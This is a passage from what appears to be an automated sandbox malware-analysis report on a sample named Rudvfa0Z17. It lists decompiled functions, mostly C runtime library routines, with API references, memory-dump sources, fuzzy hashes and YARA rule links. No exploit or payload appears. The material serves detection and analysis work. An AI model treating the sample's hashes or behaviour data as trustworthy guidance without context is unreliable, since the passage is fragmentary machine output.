                                • std::_Xinvalid_argument.LIBCPMT ref: 0041CBB7
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                  • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                • String ID: invalid map/set<T> iterator$Yr?
                                • API String ID: 1823113695-3310167766
                                • Opcode ID: 330d77bf1998aa5aa92a197fce51058970f245dfdb922181a1a3cd0453685195
                                • Instruction ID: 020ac51eae938d83d135bf30bee2d480601e1842780047efdab9eafbb5c7347a
                                • Opcode Fuzzy Hash: 330d77bf1998aa5aa92a197fce51058970f245dfdb922181a1a3cd0453685195
                                • Instruction Fuzzy Hash: CEA10D74648384DFD715CF25C494BA5BFA2AB55308F18C0AED48D4F352D336AC86CBA6
                                Function 00401B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401BB5
                                • _memmove.LIBCMT ref: 00401C06
                                  • Part of subcall function 00401E20: std::_Xinvalid_argument.LIBCPMT ref: 00401E3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$_memmove
                                • String ID: string too long
                                • API String ID: 2168136238-2556327735
                                • Opcode ID: a8942cac172f09dfd1cdfc1b2e0bf65ebecc830be2f48b96fe9bc1d522a489f0
                                • Instruction ID: 75f1ebdf17e935f49ec4d93712a82a5310d4e7158359f25100c90ea7e5a285df
                                • Opcode Fuzzy Hash: a8942cac172f09dfd1cdfc1b2e0bf65ebecc830be2f48b96fe9bc1d522a489f0
                                • Instruction Fuzzy Hash: 2731D5323046105BD7249A5CE88096BF7FAEBA2760B20093FF451DB7E1D779EC4083A9
                                Function 0041EA70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _localeconv.LIBCMT ref: 0041EAA0
                                  • Part of subcall function 0063AF33: __getptd.LIBCMT ref: 0063AF33
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __getptd_localeconv
                                • String ID: false$true
                                • API String ID: 1421026308-2658103896
                                • Opcode ID: ec33c37baa678de3168b08d80e997cec1800c41dacc77a30a62143b9279a9874
                                • Instruction ID: 9f07bac8818dbdf88d1bf0249f562d2a25c41be806f77280f9c4413154df1e15
                                • Opcode Fuzzy Hash: ec33c37baa678de3168b08d80e997cec1800c41dacc77a30a62143b9279a9874
                                • Instruction Fuzzy Hash: B5312075D0C6818BCB15DF289481666BFE2AF49310F1C44ADED874F303D676D909C796
                                Function 0040DED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,0040E0FE,00000000,?,?,?,?,?,?,0067F1C8), ref: 0040DEEB
                                  • Part of subcall function 0040DD90: LoadResource.KERNEL32(00000000,Yr?,00000000,?,?,0040DEFD,00000000,00000000,Yr?,?,00000006,?,?,?,?,0040E0FE), ref: 0040DD9D
                                • _wmemcpy_s.LIBCMT ref: 0040DF66
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Resource$FindLoad_wmemcpy_s
                                • String ID: Yr?
                                • API String ID: 3991362986-3814531584
                                • Opcode ID: 0e4f92079e87aa5db4b912468de999e3baf01197e9fa89b925c8805507435ace
                                • Instruction ID: 9064e8e551d001f0ce8000af9109614e61710a09c16867ae461dd7ba30cb464a
                                • Opcode Fuzzy Hash: 0e4f92079e87aa5db4b912468de999e3baf01197e9fa89b925c8805507435ace
                                • Instruction Fuzzy Hash: F9210A32A000125FD7209BA9DC84A3BB7E9EF85720B04857BF846EB395D6389C15C395
                                Function 0063A188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __getptd_noexit
                                • String ID: Yr?
                                • API String ID: 3074181302-3814531584
                                • Opcode ID: 224eb72904044de99117eba543f3cdaf7c00be09be422ae68e955f224c451a62
                                • Instruction ID: e6969c58cade83f5099d7fac54b4ec3a23cecc71e7dd21474025cb5b800bb801
                                • Opcode Fuzzy Hash: 224eb72904044de99117eba543f3cdaf7c00be09be422ae68e955f224c451a62
                                • Instruction Fuzzy Hash: 3A21E0318446049ECF316FE488826AB3A17AF92730F15026DF8A1472E2C7728E11E7F7
                                Function 004058D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004058E7
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                  • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                • _memmove.LIBCMT ref: 00405931
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                • String ID: string too long
                                • API String ID: 1785806476-2556327735
                                • Opcode ID: 581c8d35fe27da5bed94ee6c4c29c0b1f74af0edc716254284dda947318169df
                                • Instruction ID: fe8b88f9a0e379717774326513d91cb2ce5f1dc707cbfffd4cd1fcaa9a8e13fc
                                • Opcode Fuzzy Hash: 581c8d35fe27da5bed94ee6c4c29c0b1f74af0edc716254284dda947318169df
                                • Instruction Fuzzy Hash: FF11B4B2514B149BDB24EE78E8C093BB3A9FF51324B144A3FE487D31C1D775A8488B68
                                Function 00401920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 0040193B
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                  • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                • String ID: string too long
                                • API String ID: 963545896-2556327735
                                • Opcode ID: cba78605f68a82ce49e7065a14f1622c77ff82ff18d2d4c503214a5de30d3f6b
                                • Instruction ID: c2cea7e1ea6b9128a75631a2b2bf39ccf89588a0b0eaf6fe25adba1571a3e9b9
                                • Opcode Fuzzy Hash: cba78605f68a82ce49e7065a14f1622c77ff82ff18d2d4c503214a5de30d3f6b
                                • Instruction Fuzzy Hash: BE1106723046104BD720AA5CE890A7AF3E9EF91760F10063FF692D77E1C7B49804C3A8
                                Function 00401C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401C94
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                  • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                • _memmove.LIBCMT ref: 00401CDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                • String ID: string too long
                                • API String ID: 1785806476-2556327735
                                • Opcode ID: 2375944a4a6f7e8414832a35796bae20303f3c3520c9be5b023d117e8512a10a
                                • Instruction ID: dc466a4410b8a437badef737a8bf2bc7ac7192ab69bd59b092e7e9cd2146d576
                                • Opcode Fuzzy Hash: 2375944a4a6f7e8414832a35796bae20303f3c3520c9be5b023d117e8512a10a
                                • Instruction Fuzzy Hash: 5D11DA711487145BE7249D78A8C0A2BB799AF51314F100A3FE497932D2D775E4448658
                                Function 00402080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00402096
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                  • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                • _memmove.LIBCMT ref: 004020CF
                                Strings
                                • invalid string position, xrefs: 00402091
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                • String ID: invalid string position
                                • API String ID: 1785806476-1799206989
                                • Opcode ID: 360e3b9430fae270ea65226de6d74c28aad8cfc974b640de082e0e73a539a4f7
                                • Instruction ID: a89436a13e877e3da33af3665940be8a03eb1ed28cdd035564101695d2e7b95c
                                • Opcode Fuzzy Hash: 360e3b9430fae270ea65226de6d74c28aad8cfc974b640de082e0e73a539a4f7
                                • Instruction Fuzzy Hash: 2F01C8323003544BC725CA6CDA8496AB7AAEBD1710B24493EE681D77C1C6F6DC41D7A8
                                Function 0064E10C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _strcpy_s.LIBCMT ref: 0064E11D
                                • __invoke_watson.LIBCMT ref: 0064E171
                                  • Part of subcall function 0064DFAC: _strcat_s.LIBCMT ref: 0064DFCB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __invoke_watson_strcat_s_strcpy_s
                                • String ID: Od
                                • API String ID: 312943863-1194042738
                                • Opcode ID: 3d041f71868a7de1478b819e5a68ddf22e67a0a5aabb249086b01cf0cdc4e7b3
                                • Instruction ID: 0cb6e68ff4e7129cb42d9cbd664d60d965e4d9997bf68d529b1bfa7178f8a2a2
                                • Opcode Fuzzy Hash: 3d041f71868a7de1478b819e5a68ddf22e67a0a5aabb249086b01cf0cdc4e7b3
                                • Instruction Fuzzy Hash: 9CF0F6B24802487FDF516E60CC02DD73B5FAF11360F488065FA094B112E3739D18C790
                                Function 00405C3D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: Yr?$Yr?
                                • API String ID: 4104443479-3123445955
                                • Opcode ID: 01db9bafcee88dc00f63862808483fdc42f9ada049514870033dfad38da50502
                                • Instruction ID: 22b12c3bde665520176149b6b640409adcf7212e1075afcd2be94d96dfca1200
                                • Opcode Fuzzy Hash: 01db9bafcee88dc00f63862808483fdc42f9ada049514870033dfad38da50502
                                • Instruction Fuzzy Hash: 11014FB1A04B05ABDB08DF18D48556AF371FF44321B15813ED81557740E735B960CFE9
                                Function 026E0BBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 026E0BE6
                                  • Part of subcall function 026DEA0D: __getptd_noexit.LIBCMT ref: 026DEA10
                                  • Part of subcall function 026DEA0D: __amsg_exit.LIBCMT ref: 026DEA1D
                                • __CallSettingFrame@12.LIBCMT ref: 026E0C32
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CallFrame@12Setting__amsg_exit__getptd__getptd_noexit
                                • String ID: j
                                • API String ID: 4140145597-2137352139
                                • Opcode ID: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                • Instruction ID: f6ae024345ba75bb9f844de669f673ce322150fdbedcb2769ca134ae312367cb
                                • Opcode Fuzzy Hash: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                • Instruction Fuzzy Hash: 07115B75C0A255EFCF11DF58C4483ACBB71BB05B1CF18818ED46A3B582C3B55996CB81
                                Function 10010BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 10010BE2
                                  • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                  • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                • __CallSettingFrame@12.LIBCMT ref: 10010C2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CallFrame@12Setting__amsg_exit__getptd__getptd_noexit
                                • String ID: j
                                • API String ID: 4140145597-2137352139
                                • Opcode ID: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                • Instruction ID: c06a1c58be8673991bec95017757c486347b6274bbde7add83dd351e2b3b0df6
                                • Opcode Fuzzy Hash: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                • Instruction Fuzzy Hash: E1118E34E09655DBDB11DB54C84539CBB70FB05318F25868EE8A82F183C3B4A995CFC1
                                Function 00556513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Delete
                                • String ID: \m
                                • API String ID: 1035893169-431485060
                                • Opcode ID: 822fa9df64cbc7ec8feff1f50b72d2099273833969813342946208439e62653f
                                • Instruction ID: 1c1cf9d08d11a86594c6bea3167a093f2457405adb1f7569580990d58b4f12f3
                                • Opcode Fuzzy Hash: 822fa9df64cbc7ec8feff1f50b72d2099273833969813342946208439e62653f
                                • Instruction Fuzzy Hash: B7F0EC32A2051663AB04B7F0782B62D2957BB8A311F406438E6C25A2D3DE28D8128F63
                                Function 026E0F48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 026E0F57
                                  • Part of subcall function 026DEA0D: __getptd_noexit.LIBCMT ref: 026DEA10
                                  • Part of subcall function 026DEA0D: __amsg_exit.LIBCMT ref: 026DEA1D
                                • __getptd.LIBCMT ref: 026E0F65
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                • String ID: csm
                                • API String ID: 803148776-1018135373
                                • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                • Instruction ID: 1e26000469681d47a702f963f779ea99316fcf519c84bf3b08658a26ba90c012
                                • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                • Instruction Fuzzy Hash: 2E014B358023098FCF349F65C444BADB7B6BF04311F68462ED8826A794DBB585A1DF47
                                Function 10010F44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 10010F53
                                  • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                  • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                • __getptd.LIBCMT ref: 10010F61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                • String ID: csm
                                • API String ID: 803148776-1018135373
                                • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                • Instruction ID: 0b68c18b04a2594aeb466f25acbeb17461be63212fdf9adf152435a349185842
                                • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                • Instruction Fuzzy Hash: 41012C38A043458EDB24CF61D45569DB7F5EF04291F20452EF4815AA61CBB0E9C2CF42
                                Function 00426710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • std::exception::exception.LIBCMT ref: 00426746
                                • __CxxThrowException@8.LIBCMT ref: 0042675B
                                  • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
